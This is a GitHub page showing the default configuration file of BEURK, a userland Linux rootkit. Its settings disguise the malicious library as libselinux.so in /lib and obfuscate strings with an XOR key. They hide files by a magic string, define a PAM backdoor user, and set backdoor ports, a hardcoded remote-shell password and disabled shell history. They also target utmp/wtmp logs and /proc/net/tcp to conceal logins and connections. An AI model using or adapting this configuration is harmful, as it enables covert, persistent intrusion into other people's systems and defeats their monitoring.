-
Notifications
You must be signed in to change notification settings - Fork 96
/
Copy pathbeurk.conf
70 lines (50 loc) · 1.75 KB
/
beurk.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# BEURK is an userland rootkit for GNU/Linux, focused around stealth.
# -> Default Configuration File
#
# vi: ft=conf
# str: name of the generated evil hooking library
LIBRARY_NAME = libselinux.so
# str: where to store infected, only work in `production` mode
INFECT_DIR = /lib
# hexbyte: the XOR key to use for obfuscated strings
XOR_KEY = 0xfe
# int: set DEBUG_LEVEL to 1 or 2 (0 to disable)
DEBUG_LEVEL = 0
# str: set debug file destination
DEBUG_FILE = /dev/stderr
# str: hide files with this string in the name
MAGIC_STRING = _BEURK_
# str: PAM username (for su / ssh login)
PAM_USER = beurkroot
# int: lowest port to connect to from backdoor
LOW_BACKDOOR_PORT = 64830
# int: highest port to connect to from backdoor
HIGH_BACKDOOR_PORT = 64840
# str: password to connect
SHELL_PASSWORD = b3urkR0cks
# str: welcome message on backdoor connection
SHELL_MOTD = Welcome to BEURK's hidden shell ...
# str: remote shell to use for backdoor connection
SHELL_TYPE = /bin/bash
# str: name of the environment variable used to identify our shell
HIDDEN_ENV_VAR = BEURK_ATTACKER
# str: predefined env `key=val` strings to set on shell dropping
_ENV_IS_ATTACKER = BEURK_ATTACKER=true
_ENV_NO_HISTFILE = HISTFILE=/dev/null
_ENV_XTERM = TERM=xterm
# str: utmp file
_UTMP_FILE = /var/run/utmp
# str: wtmp file
_WTMP_FILE = /var/log/wtmp
# str: file to alter for hidding tcp/ipv4
PROC_NET_TCP = /proc/net/tcp
# str: file to alter for hidding tcp/ipv6
PROC_NET_TCP6 = /proc/net/tcp6
# str: path to processes
PROC_PATH = /proc/
# str: scanf fmt string, DO NOT TOUCH
SCANF_PROC_NET_TCP = %d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n
# str: format string for proc/env
ENV_LINE = %s/environ
# int: maximal length of our strings
MAX_LEN = 4125